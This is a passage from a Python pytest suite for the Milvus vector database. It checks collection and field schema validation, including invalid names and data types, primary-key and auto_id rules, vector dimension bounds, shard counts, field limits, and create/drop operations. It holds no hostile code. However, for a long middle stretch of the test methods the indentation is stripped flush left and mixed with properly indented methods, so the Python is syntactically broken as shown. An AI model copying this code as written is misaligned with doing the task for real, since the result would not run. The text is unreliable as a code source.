    self.collection_wrap.init_collection(c_name, schema=get_none_removed_invalid_strings,
                                         check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_collection_invalid_type_fields(self, get_invalid_type_fields):
    """
    target: test collection with invalid fields type, non-list
    method: create collection schema with non-list invalid fields
    expected: exception
    """
    self._connect()
    fields = get_invalid_type_fields
    error = {ct.err_code: 0, ct.err_msg: "The fields of schema must be type list"}
    self.collection_schema_wrap.init_collection_schema(fields=fields,
                                                       check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_collection_with_unknown_type(self):
    """
    target: test collection with unknown type
    method: create with DataType.UNKNOWN
    expected: raise exception
    """
    self._connect()
    # DataType.UNKNOWN is not a usable field dtype,
    error = {ct.err_code: 0, ct.err_msg: "Field dtype must be of DataType"}
    self.field_schema_wrap.init_field_schema(name="unknown", dtype=DataType.UNKNOWN,
                                             check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.xfail(reason="exception not Milvus Exception")
@pytest.mark.parametrize("name", [[], 1, (1,), {1: 1}, "12-s"])
def test_collection_invalid_type_field(self, name):
    """
    target: test collection with invalid field name
    method: invalid string name
    expected: raise exception
    """
    self._connect()
    c_name = cf.gen_unique_str(prefix)
    # dtype=5 corresponds to INT64; the invalid part is the non-string field name,
    field, _ = self.field_schema_wrap.init_field_schema(name=name, dtype=5, is_primary=True)
    vec_field = cf.gen_float_vec_field()
    schema = cf.gen_collection_schema(fields=[field, vec_field])
    error = {ct.err_code: 1, ct.err_msg: "expected one of: bytes, unicode"}
    self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("name", ["12-s", "12 s", "(mn)", "中文", "%$#", "a".join("a" for i in range(256))])
def test_collection_invalid_field_name(self, name):
    """
    target: test collection with invalid field name
    method: invalid string name
    expected: raise exception
    """
    self._connect()
    c_name = cf.gen_unique_str(prefix)
    field, _ = self.field_schema_wrap.init_field_schema(name=name, dtype=DataType.INT64, is_primary=True)
    vec_field = cf.gen_float_vec_field()
    schema = cf.gen_collection_schema(fields=[field, vec_field])
    # Field names follow the same naming rules as collection names,
    error = {ct.err_code: 1, ct.err_msg: "Invalid field name"}
    self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_collection_none_field_name(self):
    """
    target: test field schema with None name
    method: None field name
    expected: raise exception
    """
    self._connect()
    c_name = cf.gen_unique_str(prefix)
    field, _ = self.field_schema_wrap.init_field_schema(name=None, dtype=DataType.INT64, is_primary=True)
    schema = cf.gen_collection_schema(fields=[field, cf.gen_float_vec_field()])
    error = {ct.err_code: 1, ct.err_msg: "You should specify the name of field"}
    self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("dtype", [6, [[]], {}, (), "", "a"])
def test_collection_invalid_field_type(self, dtype):
    """
    target: test collection with invalid field type
    method: invalid DataType
    expected: raise exception
    """
    self._connect()
    # Values that are not members of the DataType enum,
    error = {ct.err_code: 0, ct.err_msg: "Field dtype must be of DataType"}
    self.field_schema_wrap.init_field_schema(name="test", dtype=dtype, is_primary=True,
                                             check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_collection_field_dtype_float_value(self):
    """
    target: test collection with float type
    method: create field with float type
    expected: raise exception
    """
    self._connect()
    c_name = cf.gen_unique_str(prefix)
    # dtype=5.0 -- a float is not a valid DataType enum member (5 would be INT64),
    field, _ = self.field_schema_wrap.init_field_schema(name=ct.default_int64_field_name, dtype=5.0,
                                                        is_primary=True)
    schema = cf.gen_collection_schema(fields=[field, cf.gen_float_vec_field()])
    error = {ct.err_code: 0, ct.err_msg: "Field type must be of DataType!"}
    self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_collection_empty_fields(self):
    """
    target: test collection with empty fields
    method: create collection with fields = []
    expected: exception
    """
    self._connect()
    # Empty field list cannot contain the required primary field,
    error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe."}
    self.collection_schema_wrap.init_collection_schema(fields=[], primary_field=ct.default_int64_field_name,
                                                       check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_dup_field(self):
    """
    target: test collection with dup field name
    method: Two FieldSchema have same name
    expected: raise exception
    """
    self._connect()
    c_name = cf.gen_unique_str(prefix)
    # Both int64 fields share the default field name,
    field_one = cf.gen_int64_field(is_primary=True)
    field_two = cf.gen_int64_field()
    schema = cf.gen_collection_schema(fields=[field_one, field_two, cf.gen_float_vec_field()])
    error = {ct.err_code: 1, ct.err_msg: "duplicated field name"}
    self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
    # Creation must have been rejected entirely,
    assert not self.utility_wrap.has_collection(c_name)[0]
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.parametrize("field", [cf.gen_float_vec_field(), cf.gen_binary_vec_field()])
def test_collection_only_vector_field(self, field):
    """
    target: test collection just with vec field
    method: create with float-vec fields
    expected: raise exception
    """
    self._connect()
    # A schema needs a primary field in addition to the vector field,
    error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe"}
    self.collection_schema_wrap.init_collection_schema([field], check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_collection_multi_float_vectors(self):
    """
    target: test collection with multi float vectors
    method: create collection with two float-vec fields
    expected: raise exception (not supported yet)
    """
    # 1. connect
    self._connect()
    # 2. create collection with multiple vectors
    c_name = cf.gen_unique_str(prefix)
    fields = [cf.gen_int64_field(is_primary=True), cf.gen_float_field(),
              cf.gen_float_vec_field(dim=default_dim), cf.gen_float_vec_field(name="tmp", dim=default_dim)]
    schema = cf.gen_collection_schema(fields=fields)
    err_msg = "multiple vector fields is not supported"
    self.collection_wrap.init_collection(c_name, schema=schema,
                                         check_task=CheckTasks.err_res,
                                         check_items={"err_code": 1, "err_msg": err_msg})
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.skip("https://github.com/milvus-io/milvus/issues/12680")
def test_collection_mix_vectors(self):
    """
    target: test collection with mix vectors
    method: create with float and binary vec
    expected: raise exception
    """
    self._connect()
    c_name = cf.gen_unique_str(prefix)
    fields = [cf.gen_int64_field(is_primary=True), cf.gen_float_vec_field(), cf.gen_binary_vec_field()]
    schema = cf.gen_collection_schema(fields=fields, auto_id=True)
    # NOTE(review): currently asserts success despite the docstring expecting an
    # exception -- kept skipped pending the linked upstream issue.
    self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
                                         check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L0)
def test_collection_without_vectors(self):
    """
    target: test collection without vectors
    method: create collection only with int field
    expected: raise exception
    """
    self._connect()
    c_name = cf.gen_unique_str(prefix)
    schema = cf.gen_collection_schema([cf.gen_int64_field(is_primary=True)])
    error = {ct.err_code: 0, ct.err_msg: "No vector field is found."}
    self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_without_primary_field(self):
    """
    target: test collection without primary field
    method: no primary field specified in collection schema and fields
    expected: raise exception
    """
    self._connect()
    # Neither field is marked primary and no primary_field is given,
    int_fields, _ = self.field_schema_wrap.init_field_schema(name=ct.default_int64_field_name, dtype=DataType.INT64)
    vec_fields, _ = self.field_schema_wrap.init_field_schema(name=ct.default_float_vec_field_name,
                                                             dtype=DataType.FLOAT_VECTOR, dim=ct.default_dim)
    error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe."}
    self.collection_schema_wrap.init_collection_schema([int_fields, vec_fields],
                                                       check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_collection_is_primary_false(self):
    """
    target: test collection with all is_primary false
    method: set all fields if_primary false
    expected: raise exception
    """
    self._connect()
    fields = [cf.gen_int64_field(is_primary=False), cf.gen_float_field(is_primary=False),
              cf.gen_float_vec_field(is_primary=False)]
    error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe."}
    self.collection_schema_wrap.init_collection_schema(fields, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("is_primary", ct.get_invalid_strs)
def test_collection_invalid_is_primary(self, is_primary):
    """
    target: test collection with invalid primary
    method: define field with is_primary=non-bool
    expected: raise exception
    """
    self._connect()
    name = cf.gen_unique_str(prefix)
    error = {ct.err_code: 0, ct.err_msg: "Param is_primary must be bool type"}
    self.field_schema_wrap.init_field_schema(name=name, dtype=DataType.INT64, is_primary=is_primary,
                                             check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("primary_field", ["12-s", "12 s", "(mn)", "中文", "%$#", "a".join("a" for i in range(256))])
def test_collection_invalid_primary_field(self, primary_field):
    """
    target: test collection with invalid primary_field
    method: specify invalid string primary_field in collection schema
    expected: raise exception
    """
    self._connect()
    # primary_field names that match no declared field,
    fields = [cf.gen_int64_field(), cf.gen_float_vec_field()]
    error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe."}
    self.collection_schema_wrap.init_collection_schema(fields=fields, primary_field=primary_field,
                                                       check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("primary_field", [[], 1, [1, "2", 3], (1,), {1: 1}, None])
def test_collection_non_string_primary_field(self, primary_field):
    """
    target: test collection with non-string primary_field
    method: primary_field type is not string
    expected: raise exception
    """
    self._connect()
    fields = [cf.gen_int64_field(), cf.gen_float_vec_field()]
    error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe."}
    self.collection_schema_wrap.init_collection_schema(fields, primary_field=primary_field,
                                                       check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_collection_not_existed_primary_field(self):
    """
    target: test collection with not exist primary field
    method: specify not existed field as primary_field
    expected: raise exception
    """
    self._connect()
    # A syntactically valid but undeclared field name,
    fake_field = cf.gen_unique_str()
    fields = [cf.gen_int64_field(), cf.gen_float_vec_field()]
    error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe."}
    self.collection_schema_wrap.init_collection_schema(fields, primary_field=fake_field,
                                                       check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L0)
def test_collection_primary_in_schema(self):
    """
    target: test collection with primary field
    method: specify primary field in CollectionSchema
    expected: collection.primary_field
    """
    self._connect()
    c_name = cf.gen_unique_str(prefix)
    schema = cf.gen_default_collection_schema(primary_field=ct.default_int64_field_name)
    self.collection_wrap.init_collection(c_name, schema=schema)
    assert self.collection_wrap.primary_field.name == ct.default_int64_field_name
@pytest.mark.tags(CaseLabel.L0)
def test_collection_primary_in_field(self):
    """
    target: test collection with primary field
    method: specify primary field in FieldSchema
    expected: collection.primary_field
    """
    self._connect()
    # Primary is declared on the field itself, not on the collection schema,
    fields = [cf.gen_int64_field(is_primary=True), cf.gen_float_field(), cf.gen_float_vec_field()]
    schema, _ = self.collection_schema_wrap.init_collection_schema(fields)
    self.collection_wrap.init_collection(cf.gen_unique_str(prefix), schema=schema)
    assert self.collection_wrap.primary_field.name == ct.default_int64_field_name
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.xfail(reason="exception not Milvus Exception")
def test_collection_unsupported_primary_field(self, get_unsupported_primary_field):
    """
    target: test collection with unsupported primary field type
    method: specify non-int64 as primary field
    expected: raise exception
    """
    self._connect()
    field = get_unsupported_primary_field
    vec_field = cf.gen_float_vec_field(name="vec")
    error = {ct.err_code: 1, ct.err_msg: "Primary key type must be DataType.INT64."}
    self.collection_schema_wrap.init_collection_schema(fields=[field, vec_field], primary_field=field.name,
                                                       check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_multi_primary_fields(self):
    """
    target: test collection with multi primary
    method: collection with two primary fields
    expected: raise exception
    """
    self._connect()
    int_field_one = cf.gen_int64_field(is_primary=True)
    int_field_two = cf.gen_int64_field(name="int2", is_primary=True)
    error = {ct.err_code: 0, ct.err_msg: "Primary key field can only be one."}
    self.collection_schema_wrap.init_collection_schema(
        fields=[int_field_one, int_field_two, cf.gen_float_vec_field()],
        check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_collection_primary_inconsistent(self):
    """
    target: test collection with different primary field setting
    method: 1. set A field is_primary 2. set primary_field is B
    expected: raise exception
    """
    self._connect()
    # Field-level primary and schema-level primary_field disagree,
    int_field_one = cf.gen_int64_field(is_primary=True)
    int_field_two = cf.gen_int64_field(name="int2")
    fields = [int_field_one, int_field_two, cf.gen_float_vec_field()]
    error = {ct.err_code: 0, ct.err_msg: "Primary key field can only be one"}
    self.collection_schema_wrap.init_collection_schema(fields, primary_field=int_field_two.name,
                                                       check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_primary_consistent(self):
    """
    target: test collection with both collection schema and field schema
    method: 1. set A field is_primary 2.set primary_field is A
    expected: verify primary field
    """
    self._connect()
    c_name = cf.gen_unique_str(prefix)
    # Field-level primary and schema-level primary_field agree -> accepted,
    int_field_one = cf.gen_int64_field(is_primary=True)
    schema = cf.gen_collection_schema(fields=[int_field_one, cf.gen_float_vec_field()],
                                      primary_field=int_field_one.name)
    self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
                                         check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.parametrize("auto_id", [True, False])
def test_collection_auto_id_in_field_schema(self, auto_id):
    """
    target: test collection with auto_id in field schema
    method: specify auto_id True in field schema
    expected: verify schema's auto_id
    """
    self._connect()
    c_name = cf.gen_unique_str(prefix)
    # auto_id set on the primary field propagates to the collection schema,
    int_field = cf.gen_int64_field(is_primary=True, auto_id=auto_id)
    vec_field = cf.gen_float_vec_field(name='vec')
    schema, _ = self.collection_schema_wrap.init_collection_schema([int_field, vec_field])
    assert schema.auto_id == auto_id
    self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
                                         check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.parametrize("auto_id", [True, False])
def test_collection_auto_id_in_collection_schema(self, auto_id):
"""
target: test collection with auto_id in collection schema
method: specify auto_id True in collection schema
expected: verify schema auto_id and collection schema
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
int_field = cf.gen_int64_field(is_primary=True)
vec_field = cf.gen_float_vec_field(name='vec')
schema, _ = self.collection_schema_wrap.init_collection_schema([int_field, vec_field], auto_id=auto_id)
assert schema.auto_id == auto_id
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L2)
def test_collection_auto_id_non_primary_field(self):
"""
target: test collection set auto_id in non-primary field
method: set auto_id=True in non-primary field
expected: raise exception
"""
self._connect()
error = {ct.err_code: 0, ct.err_msg: "auto_id can only be specified on the primary key field"}
self.field_schema_wrap.init_field_schema(name=ct.default_int64_field_name, dtype=DataType.INT64, auto_id=True,
check_task=CheckTasks.err_res, check_items=error)
    @pytest.mark.tags(CaseLabel.L2)
    def test_collection_auto_id_false_non_primary(self):
        """
        target: test collection set auto_id in non-primary field
        method: set auto_id=False in non-primary field
        expected: verify schema auto_id is False
        """
        self._connect()
        int_field_one = cf.gen_int64_field(is_primary=True)
        # auto_id=False on a non-primary field is accepted; only auto_id=True is restricted
        int_field_two = cf.gen_int64_field(name='int2', auto_id=False)
        fields = [int_field_one, int_field_two, cf.gen_float_vec_field()]
        schema, _ = self.collection_schema_wrap.init_collection_schema(fields)
        assert not schema.auto_id
@pytest.mark.tags(CaseLabel.L2)
def test_collection_auto_id_inconsistent(self):
"""
target: test collection auto_id with both collection schema and field schema
method: 1.set primary field auto_id=True in field schema 2.set auto_id=False in collection schema
expected: raise exception
"""
self._connect()
int_field = cf.gen_int64_field(is_primary=True, auto_id=True)
vec_field = cf.gen_float_vec_field(name='vec')
error = {ct.err_code: 0, ct.err_msg: "The auto_id of the collection is inconsistent with "
"the auto_id of the primary key field"}
self.collection_schema_wrap.init_collection_schema([int_field, vec_field], auto_id=False,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("auto_id", [True, False])
def test_collection_auto_id_consistent(self, auto_id):
"""
target: test collection auto_id with both collection schema and field schema
method: set auto_id=True/False both field and schema
expected: verify auto_id
"""
self._connect()
int_field = cf.gen_int64_field(is_primary=True, auto_id=auto_id)
vec_field = cf.gen_float_vec_field(name='vec')
schema, _ = self.collection_schema_wrap.init_collection_schema([int_field, vec_field], auto_id=auto_id)
assert schema.auto_id == auto_id
@pytest.mark.tags(CaseLabel.L2)
def test_collection_auto_id_none_in_field(self):
"""
target: test collection with auto_id is None
method: set auto_id=None
expected: raise exception
"""
self._connect()
error = {ct.err_code: 0, ct.err_msg: "Param auto_id must be bool type"}
self.field_schema_wrap.init_field_schema(name=ct.default_int64_field_name, dtype=DataType.INT64,
is_primary=True,
auto_id=None, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("auto_id", ct.get_invalid_strs)
def test_collection_invalid_auto_id(self, auto_id):
"""
target: test collection with invalid auto_id
method: define field with auto_id=non-bool
expected: raise exception
"""
self._connect()
int_field = cf.gen_int64_field(is_primary=True)
vec_field = cf.gen_float_vec_field(name='vec')
error = {ct.err_code: 0, ct.err_msg: "Param auto_id must be bool type"}
self.collection_schema_wrap.init_collection_schema([int_field, vec_field], auto_id=auto_id,
check_task=CheckTasks.err_res, check_items=error)
    @pytest.mark.tags(CaseLabel.L2)
    def test_collection_multi_fields_auto_id(self):
        """
        target: test collection auto_id with multi fields
        method: specify auto_id=True for multi int64 fields
        expected: todo raise exception
        """
        self._connect()
        error = {ct.err_code: 0, ct.err_msg: "auto_id can only be specified on the primary key field"}
        # first auto_id=True field is the primary key, so it is valid;
        # the returned field object is intentionally discarded
        cf.gen_int64_field(is_primary=True, auto_id=True)
        # a second auto_id=True on a non-primary field must be rejected
        self.field_schema_wrap.init_field_schema(name="int", dtype=DataType.INT64, auto_id=True,
                                                 check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("dtype", [DataType.FLOAT_VECTOR, DataType.BINARY_VECTOR])
def test_collection_vector_without_dim(self, dtype):
"""
target: test collection without dimension
method: define vector field without dim
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
float_vec_field, _ = self.field_schema_wrap.init_field_schema(name="vec", dtype=dtype)
schema = cf.gen_collection_schema(fields=[cf.gen_int64_field(is_primary=True), float_vec_field])
error = {ct.err_code: 1, ct.err_msg: "dimension is not defined in field type params"}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.xfail(reason="exception not Milvus Exception")
def test_collection_vector_invalid_dim(self, get_invalid_dim):
"""
target: test collection with invalid dimension
method: define float-vec field with invalid dimension
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
float_vec_field = cf.gen_float_vec_field(dim=get_invalid_dim)
schema = cf.gen_collection_schema(fields=[cf.gen_int64_field(is_primary=True), float_vec_field])
error = {ct.err_code: 1, ct.err_msg: f'invalid dim: {get_invalid_dim}'}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
    @pytest.mark.tags(CaseLabel.L2)
    @pytest.mark.parametrize("dim", [-1, 0, 32769])
    def test_collection_vector_out_bounds_dim(self, dim):
        """
        target: test collection with out of bounds dim
        method: invalid dim -1, 0 and 32769 (valid range is 1 ~ 32768)
        expected: raise exception
        """
        self._connect()
        c_name = cf.gen_unique_str(prefix)
        float_vec_field = cf.gen_float_vec_field(dim=dim)
        schema = cf.gen_collection_schema(fields=[cf.gen_int64_field(is_primary=True), float_vec_field])
        error = {ct.err_code: 1, ct.err_msg: "invalid dimension: {}. should be in range 1 ~ 32768".format(dim)}
        self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_non_vector_field_dim(self):
"""
target: test collection with dim for non-vector field
method: define int64 field with dim
expected: no exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
int_field, _ = self.field_schema_wrap.init_field_schema(name=ct.default_int64_field_name, dtype=DataType.INT64,
dim=ct.default_dim)
float_vec_field = cf.gen_float_vec_field()
schema = cf.gen_collection_schema(fields=[int_field, float_vec_field],
primary_field=ct.default_int64_field_name)
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L1)
def test_collection_desc(self):
"""
target: test collection with description
method: create with description
expected: assert default description
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_default_collection_schema(description=ct.collection_desc)
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L2)
def test_collection_none_desc(self):
"""
target: test collection with none description
method: create with none description
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_default_collection_schema(description=None)
error = {ct.err_code: 1, ct.err_msg: "None has type NoneType, but expected one of: bytes, unicode"}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_collection_long_desc(self):
"""
target: test collection with long desc
method: create with long desc
expected:
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
desc = "a".join("a" for _ in range(256))
schema = cf.gen_default_collection_schema(description=desc)
self.collection_wrap.init_collection(c_name, schema=schema,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L0)
def test_collection_binary(self):
"""
target: test collection with binary-vec
method: create collection with binary field
expected: assert binary field
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
self.collection_wrap.init_collection(c_name, schema=default_binary_schema,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_binary_schema})
assert c_name in self.utility_wrap.list_collections()[0]
@pytest.mark.tags(CaseLabel.L0)
def test_collection_shards_num_with_default_value(self):
"""
target:test collection with shards_num
method:create collection with shards_num
expected: no exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
self.collection_wrap.init_collection(c_name, schema=default_schema, shards_num=default_shards_num,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_shards_num: default_shards_num})
assert c_name in self.utility_wrap.list_collections()[0]
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.parametrize("shards_num", [-256, 0, 10, 256])
def test_collection_shards_num_with_not_default_value(self, shards_num):
"""
target:test collection with shards_num
method:create collection with not default shards_num
expected: no exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
self.collection_wrap.init_collection(c_name, schema=default_schema, shards_num=shards_num,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_shards_num: shards_num})
assert c_name in self.utility_wrap.list_collections()[0]
@pytest.mark.tags(CaseLabel.L2)
def test_collection_shards_num_with_error_type(self):
"""
target:test collection with error type shards_num
method:create collection with error type shards_num
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
error_type_shards_num = "2" # suppose to be int rather than str
error = {ct.err_code: -1, ct.err_msg: f"expected one of: int, long"}
self.collection_wrap.init_collection(c_name, schema=default_schema, shards_num=error_type_shards_num,
check_task=CheckTasks.err_res,
check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_create_collection_maximum_fields(self):
"""
target: test create collection with maximum fields
method: create collection with maximum field number
expected: no exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
int_fields = []
limit_num = ct.max_field_num - 2
for i in range(limit_num):
int_field_name = cf.gen_unique_str("field_name")
field = cf.gen_int64_field(name=int_field_name)
int_fields.append(field)
int_fields.append(cf.gen_float_vec_field())
int_fields.append(cf.gen_int64_field(is_primary=True))
schema = cf.gen_collection_schema(fields=int_fields)
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L2)
def test_create_collection_over_maximum_fields(self):
"""
target: Test create collection with more than the maximum fields
method: create collection with more than the maximum field number
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
int_fields = []
limit_num = ct.max_field_num
for i in range(limit_num):
int_field_name = cf.gen_unique_str("field_name")
field = cf.gen_int64_field(name=int_field_name)
int_fields.append(field)
int_fields.append(cf.gen_float_vec_field())
int_fields.append(cf.gen_int64_field(is_primary=True))
schema = cf.gen_collection_schema(fields=int_fields)
error = {ct.err_code: 1, ct.err_msg: "maximum field's number should be limited to 256"}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
class TestCollectionOperation(TestcaseBase):
    """
    ******************************************************************
    The following cases are used to test collection interface operations
    ******************************************************************
    """
    @pytest.mark.tags(CaseLabel.L2)
    def test_collection_without_connection(self):
        """
        target: test collection without connection
        method: 1.create collection after connection removed
        expected: raise exception
        """
        self._connect()
        c_name = cf.gen_unique_str(prefix)
        # drop the default connection so the create call has no server to talk to
        self.connection_wrap.remove_connection(ct.default_alias)
        res_list, _ = self.connection_wrap.list_connections()
        assert ct.default_alias not in res_list
        error = {ct.err_code: 0, ct.err_msg: 'should create connect first'}
        self.collection_wrap.init_collection(c_name, schema=default_schema,
                                             check_task=CheckTasks.err_res, check_items=error)
        # the wrapper must not hold a half-initialized collection after failure
        assert self.collection_wrap.collection is None
    @pytest.mark.tags(CaseLabel.L1)
    def test_collection_multi_create_drop(self):
        """
        target: test cycle creation and deletion of multiple collections
        method: in a loop, collections are created and deleted sequentially
        expected: no exception
        """
        self._connect()
        c_num = 20
        for _ in range(c_num):
            c_name = cf.gen_unique_str(prefix)
            self.collection_wrap.init_collection(c_name, schema=default_schema,
                                                 check_task=CheckTasks.check_collection_property,
                                                 check_items={exp_name: c_name, exp_schema: default_schema})
            self.collection_wrap.drop()
            assert c_name not in self.utility_wrap.list_collections()[0]
    @pytest.mark.tags(CaseLabel.L1)
    def test_collection_dup_name_drop(self):
        """
        target: test collection with dup name, and drop
        method: 1. two dup name collection object
                2. one object drop collection
        expected: collection dropped
        """
        self._connect()
        c_name = cf.gen_unique_str(prefix)
        # two wrapper objects referencing the same server-side collection
        collection_w = self.init_collection_wrap(name=c_name, check_task=CheckTasks.check_collection_property,
                                                 check_items={exp_name: c_name, exp_schema: default_schema})
        self.collection_wrap.init_collection(c_name, check_task=CheckTasks.check_collection_property,
                                             check_items={exp_name: c_name, exp_schema: default_schema})
        self.collection_wrap.drop()
        assert not self.utility_wrap.has_collection(c_name)[0]
        # the sibling object now points at a dropped collection, so any call fails
        error = {ct.err_code: 1, ct.err_msg: f'HasPartition failed: can\'t find collection: {c_name}'}
        collection_w.has_partition("p", check_task=CheckTasks.err_res, check_items=error)
    @pytest.mark.tags(CaseLabel.L1)
    def test_collection_after_drop(self):
        """
        target: test create collection after create and drop
        method: 1. create a 2. drop a 3, re-create a
        expected: no exception
        """
        c_name = cf.gen_unique_str(prefix)
        collection_w = self.init_collection_wrap(name=c_name, check_task=CheckTasks.check_collection_property,
                                                 check_items={exp_name: c_name, exp_schema: default_schema})
        collection_w.drop()
        assert not self.utility_wrap.has_collection(collection_w.name)[0]
        # the same name must be reusable once the old collection is gone
        self.init_collection_wrap(name=c_name, check_task=CheckTasks.check_collection_property,
                                  check_items={exp_name: c_name, exp_schema: default_schema})
        assert self.utility_wrap.has_collection(c_name)[0]
    @pytest.mark.tags(CaseLabel.L1)
    def test_collection_all_datatype_fields(self):
        """
        target: test create collection with all dataType fields
        method: create collection with all dataType schema
        expected: create successfully
        """
        self._connect()
        fields = []
        # skip UNKNOWN/STRING (unsupported here) and the vector types (added separately below)
        for k, v in DataType.__members__.items():
            if v and v != DataType.UNKNOWN and v != DataType.STRING and v != DataType.FLOAT_VECTOR and v != DataType.BINARY_VECTOR:
                field, _ = self.field_schema_wrap.init_field_schema(name=k.lower(), dtype=v)
                fields.append(field)
        fields.append(cf.gen_float_vec_field())
        schema, _ = self.collection_schema_wrap.init_collection_schema(fields,
                                                                       primary_field=ct.default_int64_field_name)
        c_name = cf.gen_unique_str(prefix)
        self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
                                             check_items={exp_name: c_name, exp_schema: schema})
    @pytest.mark.tags(CaseLabel.L1)
    def test_collection_string_field(self):
        """
        target: test create with string field
        method: create collection with string field
        expected: Raise exception
        """
        self._connect()
        string_field = self.field_schema_wrap.init_field_schema(name="string", dtype=DataType.STRING)[0]
        int_field = cf.gen_int64_field(is_primary=True)
        vec_field = cf.gen_float_vec_field()
        schema = cf.gen_collection_schema(fields=[int_field, string_field, vec_field])
        error = {ct.err_code: 0, ct.err_msg: "string data type not supported yet"}
